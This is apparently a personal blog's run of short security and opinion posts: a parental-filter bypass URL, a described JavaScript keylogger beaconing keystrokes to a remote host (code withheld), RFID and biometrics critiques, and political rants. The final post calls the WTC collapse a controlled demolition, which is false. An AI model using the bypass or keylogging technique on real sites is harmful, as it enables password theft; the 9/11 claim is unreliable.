Anyway, deciding I’d take a little peek in the first random Firefox filtering plugin that I could find, downloaded it from “some site”, and unpacked the XPI.

This immediately caught my eye, and any coders should see the obvious error:

    //don't hide page if within FoxFilter mgmt pages
    if(aURI.spec.indexOf("chrome://foxfilter") != -1)
        return;

That is definitely not the way to check for such an URL. Quite a “beginners” error actually. I wanted to confirm this makes the whole filter useless, but was incorrectly thinking that I had to register first before using the plugin — so closed the browser and deleted the add-on.

Later I thought differently, and couldn’t resist finding it again and re-installing it. This time I downloaded it from the Mozilla Add-On site; and an agreement I had to agree to. Oh well…

There this caught my eye though: “The FoxFilter Team has spent HUNDREDS of hours in development, maintenance and support of FoxFilter. We are very proud of our product and are very happy that is helping protect children, teens AND adults from inappropriate content on the Internet.“.

Hundreds of hours missed that obvious error? Took me barely 5 seconds… OK enough with the being cocky already…

Anyway, downloaded the thing again; re-installed it and confirmed filtering was succesful when I went to “http://www.playboy.com”.

And, confirmed that it horribly failed on “http://www.playboy.com/?chrome://foxfilter“.

Yep, it is that easy. Then to think people pay for something it cannot really do (well until it is patched of course):

Premium Features

In addition to all of the great filtering features that have always been free of charge, we also offer security features as part of our premium service. Security features provide you with the ability to secure your settings with a password and prevent FoxFilter from being bypassed, uninstalled or disabled. A small support fee is required to obtain a registration code which enables the security features.

I’ve always thought that one should never, ever, trust software to do things that they claim to do properly. Even the most advanced logic could be bypassed by a silly mistake before it even reaches your advanced logic. If you got the chance to check it out, you should — just to prevent surprises in the future…

OK back into my lair…

Yay.

As a result I am now delisted from Google’s index.

Apparently, this has been going on for a couple of months, but I was too busy with actual work so I never read any articles about it on the security-sites I normally occasionally visit.

Oh well, shit happens, and stuff has quickly been cleaned up (thank you, backups!) … and for safety have upgraded to the latest WordPress version. Not having upgraded a while ago, I was really just waiting for this to happen (yeh, lazy sysadmins et cetera )…

Seeing that basically the attacker could run any PHP code of his/her choice, which could include calling system binaries to retrieve information about user accounts or passwords. As I can not be a 100% sure about that at this moment, all the passwords have been reset to protect the innocent.

I am curious how long it’ll take before I get listed on Google again (as I still see Googlebot regularly visit the site)…

And… it’s not people that abuse things who harm people — it’s the people that put those things there without thinking.

An explaination: I have always been intrigued by HTML forms. As a paranoid person, I have always wondered whether companies or websites are logging keypresses to their website. Picture the situation where you want to leave feedback at a site… but finally do not hit the “Send” button because of various reasons, like, for instance, the tone was too harsh so you decide not to. For the website it could have been very useful information: unsent comment or feedback may be more valuable than the ones that are actually arriving in their inboxes.

That was quite some time ago — and I didn’t give it any more thought until recently… See, I noticed that, for instance when I have worked the whole day, or the operating system is just acting up, sometimes the wrong window has the focus, and I am happily typing away, seeing nothing appear in the window I was staring at…. (Yeh, it happens.)

Now, there could be even more valuable information! Interesting bits of text, login names — or even better, accidentally typed passwords!

With that in my paranoid mind, I started tinkering around with Javascript to see if this is actually possible… I quickly put together some rather trivial code that captures the KeyboardEvent, inspects it, and collects them all into a string. Through the body’s onunload I called a routine that displayed an alert saying something like “Hey, you left these keypresses at this website: the collected string“.

Using the onunload however has several drawbacks:
- it isn’t always called (for instance, when the browser crashes),
- it seems the body’s onunload can only be set when the document is generated, that kinda sucks if you wanted to do be able to do the keylogging by simply loading some remotely stored Javascript file.

The curious and experimenting person that I am, I realised a bad guy would be not collecting the information and printing it — but would be sending them to a remote machine. Hmm, a remote machine, so AJAX won’t do… but there are always images…. What if I dynamically create an image, with a src pointing to some other website, with the pressed character in the GET request? Nice and simple, right?

OK, so now the keylogger is loaded and active when the following line is somehow inserted into a website:

<script type=”text/javascript” src=”http://someevilmachine/wtfjs.php”></script>

This simple single script, when loaded, attaches itself to the keyPressDown event of the document, of course remembering any old setting so to be able to pass the event through to any “local” code on the target website, as an attempt to go “undetected”.

Also, modern websites have all kinds of Javascript running, and could do some additional “setting up” from Javascript from which the event handlers get set… In an attempt to take this into account, the logger attaches itself after a delay of a given amount of milliseconds. After that, the moment a keypress event is received in the window, the requests appear in the logfile on the remote website (obligatory dump follows):

GET /temp/wtfimg.php?c=d HTTP/1.1″ 200 –
GET /temp/wtfimg.php?c=s HTTP/1.1″ 200 –
GET /temp/wtfimg.php?c=d HTTP/1.1″ 200 -

The drawback to the method currently, is that it sends a request with every keystroke made, which may be noticed by the more adept computer user… it would be possible to send collected strings at a given interval… But really, actually building a succesful keylogger isn’t the point; the point was figuring out if it is really doable (which, non-surprisingly, it is).

By the way, I’m rightly aware of the fact that I am discussing nothing really new here — this is absolutely no cutting-edge stuff. More interestingly, this has probably already been done by bad guys for ages.

On some websites with many authors that incidentally have the permission to insert Javascript, these “lower level” users could be able to catch passwords of administrative users, et cetera.

All-in-all, the only thing I am really frigging flabbergasted at, is the fact that an <input type="password"> actually sends the pressed key in a keypress event… WTF!? Knowing this, and wanting to “protect” a password entry field, I tried it by giving it its own onkeypress-handler….. I figured that it would get precendence over the documents’ keypress, but alas, it doesn’t…

It seems that there is no way to guard against this, other than to re-set your “local” event handlers regularly (which is no solution but a hack!)…

In conclusion, I really think that the password input type should somehow be prevented from putting any valid information about the pressed key into the KeyboardEvent. I know it’s used for comparing 2 passwords to validate a user’s password change for instance — but some hash could perfectly suffice there.

I am convinced the website-scripter should not ever have to have access to the real password entered in that field from Javascript — thinking that that could achieve some ‘protection’ is a flawed train of thought anyways…

Oh by the way, if you are looking for code: I will not release it here. It really isn’t difficult to cook some up yourself.

I was just reading Bruce Schneier’s CRYPTO-GRAM and he linked to this suprisingly good track (direct link to MP3) by MC Frontalot, called Secrets From The Future (direct link to the lyrics).

To quote the chorus:

You can’t hide secrets from the future with math.
You can try, but I bet that in the future they laugh
at the half-assed schemes and algorithms amassed
to enforce cryptographs in the past.

I dig it — I really, really dig it.

Who says that websites aren’t already recording your movements?

I mean — earlier in this century I was thinking that, when you are a big corporation, and you have some ‘comments, complaints & suggestions‘ section on the website where people can, well, comment, complain and make suggestions, it is pretty damn valueable to know what people typed into that TEXTAREA but did not submit the information.

Never gave that any thought, until today, reading the above and thinking and — yeh, with all that ‘asynchronous javascript’ — that’s even more easier to implement today. I know Gmail does this — it’s one of the most important ‘features’: Google knows about every email you did not sent.. Every complaint, rant or love-letter you did not send is still in their ‘entropy’ to compressing the whole world into a single system… although you, at the last moment, decided not to send it…

Which makes me wonder… Are there any other web-based forms that actually already do this?

And more importantly — if this happens, is this illegal — or is it possible because of some loop-hole in the system (i.e. can one prevent prosecution with a well-written click-through end-user license-agreement, disclaimers, et cetera?).

I mean — they are my frigging movements — they should be protected by copyright and nobody can steal them just as it is illegal for me to download copyrighted music, right?

Why can’t I copy a CD (or do they use poor techniques in a feeble attempt to prevent me from doing so), while other types of corporations can frigging record my intellectual property? And not only websites — what about biometric systems depending on a record of your physical information. I don’t know, but being reduced to an insignificant set of parameters kind-a feels like rape. It’s disrespectfull and it introduces more problems than they solve.

There must be a way to sue the companies that do this, for just as an excessive amount of damage done, like the MPAA and RIAA are inflating the numbers of piracy. Just like them, I should be able to be a rich man too, without actually doing any real work or producing anything.

(On that note — I just love this whole ‘Try Before You Buy‘ concept that we have on the Internet these days. You can download whatever crap you might want to buy before actually wasting your hard-earned money on a piece of shit film or whatever. There are plenty of things that I wouldn’t have bought if I didn’t first got it from somewhere else. There’s nothing wrong with that. The media only too well realises that 99% of their output is plain and utter crap and don’t frigging want you to try — and have to resort to cheap marketing ploys because you’d never even be remotely interested in it.

If only the record- and movie industry had been a little more honest in the past — we could be looking at a grand world right now without the wasted cash on (flawed-by-design) DRM restrictions and, more importantly, we could’ve had quality productions. I mean — they are in the entertainment-business and I find those guys practices hardly entertaining. In that respect, the Internet really is serving society — it actually does help the people prevent them from wasting their precious cash on artificially over-priced garbage. But again, I digress….)

I just don’t like the idea of keeping tabs on where my cursor goes, the keys that I touch or what my eyes are balling, merely for creating more ‘efficient’ (read: deceiving) marketing ploys.

It’s not funny when the feds come around to take all your hardware for exposing a three year old hole (which could’ve been abused all along). ‘Taking down’ this guy doesn’t really solve any problems caused by this poor system.

Technology is mankinds Achilles-heel, I tell ya.

I mean, you can say that its wrong of the guy exploiting this hole to such an extent — but hell — it was reported on earlier, by Bruce Schneier in 2003 (!). Sure as hell it’s their own frigging fault that they hadn’t picked this up earlier, and thus allowed this ‘mass-exploitation’. And hey its pretty understandable this happens: it fucks with us any opportunity it gets — why not fuck the system?

If they can’t even protect their ‘most valuable good’, how can we expect voting machines to tell the truth?

See, I really have nothing to hide. I fear that ‘The Man’ only wrongly interprets the information and I get Red Flagged for nothing.

People always thought I was kidding when I said that, but I’m ever so serious. Recently I was thinking that, basically, some anti-piracy dickheads would dare to state that, if one buys computer components, or a PC, from a retailer and he doesn’t include an operating system, the person would be a software-pirate.

When I today read this article here, well, my fears are confirmed.

The BSA wants more enforcement and I can see them convincing ‘the law’ that people that do not buy an OS are pirates.

Which is, of course, a big load of crock.

Piracy, Surveillance, Privacy

I didn’t ask for that cheap, vulnerable, very easily exploitable, technology.

But I am forced to use it.

Now, if somebody threatens my life, I either risk getting shot by the guy, or getting sued by the state, because I’m a criminal when I hand over my PIN-code. Like I said: I did not ask for this vulnerable technology, and, I didn’t ask for the banks to move to machines, so they could fire their (human) personnel thus make more money.

So now, in order to fix the problem they have created, they’re labeling us as suspects, pointing the blame at us?

See how they distrust you? And we are expected to trust them?

Remember years ago, when we had to physically go to the bank to get funds and had to show our passport to a person before we got our money.

The whole ‘Gimme your PIN-code at gun-point‘ situation wouldn’t even exist then. Basically, they are trying to fix a broken system that shouldn’t have been introduced in the first place.

Watch my words, in a couple of years we get this same shit dealing with RFID and other ‘new’ stuff.

PIN-code, Criminal, Threat, the Netherlands

Real funny, that.

Safe computing is impossible if the machines are worked by idiots, right? So why even try? The only way that this can really be guaranteed if you take away all liberties people have on their machine — just like, a truely safe environment can only really be accomplished if everybody’s repressed to the bone.

And that can hardly be called ‘good’, right?

Vista, Microsoft, Virus

Basically, RFID passports do not guarantee the safety and security they were invented for in the first place.

Now, I am not surprised, neither would be anybody else watching these governmental wet-dream technologies. But I bet there’s still plenty people around that don’t.

The demo is available as a MOV as well.

Oh — and anybody thinking that RFID passports and biometrics are for your own safety and security: don’t you believe it. Accepting biometrics as an authentication mechanism is not for your own safety at all.

It’s because The Man doesn’t want to torture you to get to your PIN-code or password, or the access code to your safety vault. He just wants to grab your hand, place it on the scanner and shove your face into the iris-recognition thing and get to your private stuff. That said, the people pushing this shit must be criminal.

The fact that, in the near future, it will be impossible for me to give my bank-card to my girlfriend to use the ATM machine, to me, isn’t more freedom, but rather more repression…

RFID, Passports, Technology, Facade

Of course they say ‘these wrongly parked cars are hindering the ambulances‘. Although that may be true, that sure is hell isn’t the real reason they’re doing this. It’s those damn quota’s that make these cops do this shit.

And we can’t police the police because then, shit like this occurs.

Freedom? Last time I seen it, it was trying to stand up for Civil Liberties but got beat-up and maimed by Opportunitism.

Abuse, Technology, Repression, Big Brother

Spread the Word, Press..

WordPress, Blogs, Vulnerability, Security

Now, I wonder — do women over-estimate the blow-up dolls’ size, too?

However sexist the whole concept is, it may be concluded that a women’s mind is easily distracted, more succeptible to invasive, negative thoughts that might influence their performance.

Of course this solution doesn’t really work either — it is fooling the women (or person using it) into believing that it is, indeed, safer.

The fact is that anybody using it, seriously does over-estimate its power. Any criminal or sex-offender on a mission can simply use heat-detection to detect that the guy sitting next to the woman is a fake.

It’s a funny concept, but I laugh even harder at the people will actually buy it… In my humble opinion its actually sickening trying to make money of someones’ mental insecurity selling a solution that doesn’t really work.

(Trying hard to refrain from making parallels with the Airplane! film.)

Observation, Blow-up Dolls, Driving, Cars

Basically, the work is done by this device, called the proxmark3, that;

[it] can do almost anything involving almost any kind of low-(~125 kHz) or high-(~13.56 MHz) frequency RFID tag. It can act as a reader. It can eavesdrop on a transaction between another reader and a tag. It can analyze the signal received over the air more closely, for example to perform an attack in which we derive information from the tag’s instantaneous power consumption. It can pretend to be a tag itself.

Not surprisingly either, security experts have been warning for these possibilities for years but happily ignored by the wet-dream-having politicians paid by the RFID-lobbyists…

Technology, RFID, Unsafe

A user can authenticate themselves to the bank, using their voice as their passport. Anyone that remember the film Sneakers will remember that, basically, you could record and playback somebody’s bank-account number after you’ve snooped from them. “My voice is my passport”…

That said, I really do hope some other, random number is asked and even then its unlikely to be full-proof.

Luckily, it’s a voluntary service and no transactions can be done with it (yet) but it’s sad enough that somebody else, using your recorded voice, can figure out how much you got in your account.

That isn’t progress at all.

Banking, Safety, Privacy, Voice Recognition

[..] the “biggest military hack of all time” [..]

Which in itself is absolute bullshit because the ‘biggest military hack’, at least strategically, is the forced usage of Microsoft Windows by every damn government in the world.

But I slightly digress.

This guy only did one thing: prove how fucking lame the US protects its valuable information. Ah, and one other thing: the UK government doesn’t listen to its citizens.

It’s obviously just meant to send a signal: `Don’t do this you evil hackers, you’ll go to Gbay.‘ which, in itself, is an act of sheer terror.

BTW who’s to guarantee that the United States isn’t recruiting him for their jihad?

Gary McKinnon, Terror, Hackers, Crackers

OK this is interesting.

This actually proves the point I made earlier today: although one can ‘copy a file using a mouse’ this says shit about ones computer literacy. To explain this analogy: people can use the phone, but don’t know shit about any consequences.

Any idiot keeping their Bluetooth device in its default factory settings, allowing anyone to connect and send to the damn thing, will be punished accordingly… See, it is only a matter of time before the real evil guys find out how to compromise the technology used in any shop so in stead of ‘innocent’ spam, it will start sending out virus-infected data files.

Believe me, this won’t be as difficult, or as far-fetched, as most people like to think it is.

Bluecasting, Advertisement, Spam

The lawyer stated that:

MySpace is more concerned about making money than protecting children online.

Of course, parents can’t hardly be blamed for neglecting their kids — wanting time for themselves, putting the child behind a computer in the first place.

The guy continued with:

[..] they should compensate the girl for their failure to protect her online when they knew sexual predators were on that site.

They knew sexual predators were on that site? What the hell happened to common sense?

Sexual predators are everywhere. The failure to recognize that leaves these parents, themselves, responsible, and guilty, as hell. That’s like, leaving your kids in front of the pub while getting drunk and then wonder where the hell they are at 02:30 AM and notice they have been abducted.

The family might think they find ‘peace’ in getting some compensation; but in my humble opinion, if they accept that money — it is effectively prostitution.

Anyway, the lawyer argues that:

[..] none of the registration information the site requires needs to be true, and nothing is done to verify a user’s age.

Aha — so that’s where this stuff is heading!

I was thinking this was about a sexual assault on a minor, but meanwhile it has became clear that this is all about identifiability, tracking and tracing every on-line move.

It could just be that somebody wants credit card or social security numbers, or any other unique identifier, to be required information on registration forms, naively thinking this will make all the badness in humans go away.

Or the family just wants money. That’s pretty likely as well. Although being a bit blurry, I can say one definite thing about the family’s motives: a true concerning parent wouldn’t sue for money — a concerning parent would rather see the whole operations being shut down.

MySpace, Protection, Greed

The moment I heard that I was thinking: and they jump to this conclusion because… ? The guy’s missing? Cellular phone data implicated him in the vicinity? So basically they’re only jumping to this conclusion because some database, or computer system spitted that out?

Today, my suspicions were confirmed: it is reported that the suspect has seen himself on TV and immediately went to the police. Yeh, he was in the neighbourhood the night the girls gone missing and was immediately branded the suspect. The man or woman that really kidnapped these kids probably has never yet been arrested for a sex-offence. And while the police was too fucking busy finding out where all the local sex-offenders were that day, the real kidnapper has had ample time to get as far away as possible. Probably already left the country.

Anyway, if you read how this woman actually treated her children, it could be some form of poetic justice in progress here. See, the women finds it strange that, at 02:30 AM in the morning when she walked out of the cafe that she got drunk in, her children weren’t outside the cafe where she had left them.

Left them? At 2:30 AM in the morning? And she’s blaming others for kidnapping these kids?

If we leave our keys in our car and it gets stolen, the judge will say it was stupid to leave the keys in the ignition: that is creating the opportunity.

Kidnapping, Belgium

Today, parliament decided to accept 2 new laws in order to make it easier to repress, suppress and oppress.

See, this new law has some things in it that could effectively send anyone to Gbay, or at least some jail.

Now it is made illegal to intrude a computer system.

No matter how, or why. To make sure that Microsoft’s crappy software cannot be blamed — they introduced that little change, making the how and why irrelevant. Also, if you broke into the system just to prove that some company has been ripping off the people and the state for millions and millions of dollars, you’re still elegible to end up in jail for at least 1 year.

Idiots.

They even make it illegal to have certain ‘tools’ on your computer. Really, I have got nothing to hide, but I definitely fear the man’s interpretation. Sure I got some tools present on my network to do assessments whether it’s safe enough. Or to test some machine against some hole. Yep, this new law can send you to jail, just for that.

That’s insane. Supposedly, this stuff has been discussed for 4,5 years. Seeing this came out of it — those naive fuckers in the government don’t know shit.

In current day and age, with all these unprotected wireless connections, all of the above acts can’t even be proven without any reasonable doubt!!

The ‘no matter how‘ bit scares me. All these silly laws scare me. Basically, by setting up an URL that could intrude some network (but not following it myself), I can associate all the visitors to my website with an intrusion somewhere else. The judge won’t care ‘how’ and ‘why’ this happened — you’ll just get sent to jail.

Basically, anybody hitting repeatedly hitting Refresh can be sent to jail: that’s the act of willingly putting a load on another network.

Internet, Cybercrime, The Netherlands

The fun thing is, although broken, the laptop contains a gem of personal information. Information that this new owner now has happily posted on the internet as a form of pay-back.

The seems genuine, and pretty damn funny.

eBay, Laptops, Humour

Yeah it’s funny.

And yeah — it’s oh-so true…

Biometrics, Vulnerability, Security

She says that the governments responsibility doesn’t end at the border. Well, last time I checked the Dutch law I read that is only applicable on Dutch territory.

Yeah yeah, so she wants us to waste more government money to prevent stuff that either never happens, or can’t be done anything about to fucking protect against.

Fuck — anti-terror laws should’ve prevented a second Oklahoma-style bombing. Yeah, well, we all see what happens when intelligence still fucking fails because humans, basically, are all fucking corrupt.

The fear-mongering governments want us to think that these bad guys are all out for the whole frigging society.

Just for the sake of the fucking argument, assume that threat is true. Why should she get ‘more’ protection than you and me? I haven’t got personal bodyguards. I don’t get to drive a bullet-proof-car without me having to buy it myself!

For the sake of argument, if I keep on telling that, for instance, I don’t mind if anything bad would happen to any corrupt politician, and other people because of that would start throwing dead-threats at me, wouldn’t it be awfully silly for me to call the police because I am, myself, creating that situation? Precisely…

That woman gets way too much credit than she deserves…

Ayaan, The Netherlands, Politics

That obviously proves there’s too many idiots in the IT security business too.

We’ve been blinded with ‘expert opinions’ on the whole WTC collapse but hell, you have to be a real moron to think that it wasn’t a controlled demolition. Shit — anyone with some common sense could reach that conclusion.

Rant, Security, 911, WTC